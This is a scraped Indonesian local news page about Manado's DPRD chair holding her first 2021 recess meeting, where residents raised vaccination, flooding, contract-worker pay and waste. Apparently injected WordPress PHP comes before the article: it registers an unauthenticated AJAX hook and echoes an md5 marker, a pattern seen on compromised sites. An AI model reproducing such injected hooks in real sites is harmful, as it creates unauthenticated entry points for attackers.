function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Ketua DPRD Manado Gelar Reses Pertama Tahun 2021 – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 6 Apr 2021 15:24 WIB ·

Ketua DPRD Manado Gelar Reses Pertama Tahun 2021


					Ketua DPRD Manado Gelar Reses Pertama Tahun 2021 Perbesar

MANADO – Ketua DPRD Kota Manado Dra.Aaltje Dondokambey M.Apt menggelar kegiatan reses pertama tahun 2021 di Kelurahan Tikala Baru Lingkungan II, Kecamatan Tikala, Selasa (6/4/2021).

Menurut Altje Dondokambey, kegiatan reses dilakukan sebagaimana amanat undang-undang kepada setiap wakil rakyat untuk turun di Dapil masing-masing.

“Ini merupakan reses pertama di tahun 2021. Dalam setahun, anggota DPRD diberikan kesempatan 3 kali melakukan reses di Dapil masing-masing untuk menjemput aspirasi dari masyarakat,” kata Aaltje Dondokambey didampingi Kepala Dinas Kesehatan Manado Ivan Marthen, Camat Tikala Argo Sangkay, serta Lurah Tikala Baru Fanly Solang.

Dalam agenda tanya jawab, Ketua DPRD Manado mendapatkan sejumlah aspirasi dari masyarakat sekitar. Seperti masalah vaksinasi, daerah rawan banjir, gaji THL, serta masalah persampahan di lingkungan.

Menjawab aspirasi masyarakat, Ketua Dewan memberikan kesempatan kepada Instansi terkait yang jadir untuk menjawab pertanyaan warga.

“Untuk masalah vaksinasi, Pemkot Manado sudah menyelesaikan 2 tahap vaksinasi untuk mereka yang masuk skala prioritas. Namun sejatinya, semua warga akan divaksin sesuai jadwal dan ketersediaan vaksin dari pemerintah pusat,” kata Kepala Dinkes Ivan Marthen.

Terkait Masalah banjir, Lurah Tikala baru Fanly Solang menjelaskan bahwa selokan di wilayah tersebut perlu diperbaiki.

“Selokan disini sudah tidak mampu menampung volume air yang datang dari daerah ketinggian. Sehingga warga yang ada di daerah rendah mendapatkan akibatnya. Selokan disini perlu dikeruk supaya air bisa mengalir dengan baik.

Sementara itu, Camat Tikala Argo Sangkay menjelaskan terkait mekanisme pembayaran gaji oleh Pemkot Manado.

“Masalah gaji THL untuk beberapa bulan terakhir memang terjadi keterlambatan karena adanya recofusing anggaran ke penanganan Covid-19. Namun untuk gaji dari para THL tetap akan dibayarkan oleh Pemkot Manado,” Pungkasnya. (Auddy Manoppo)

Artikel ini telah dibaca 2 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO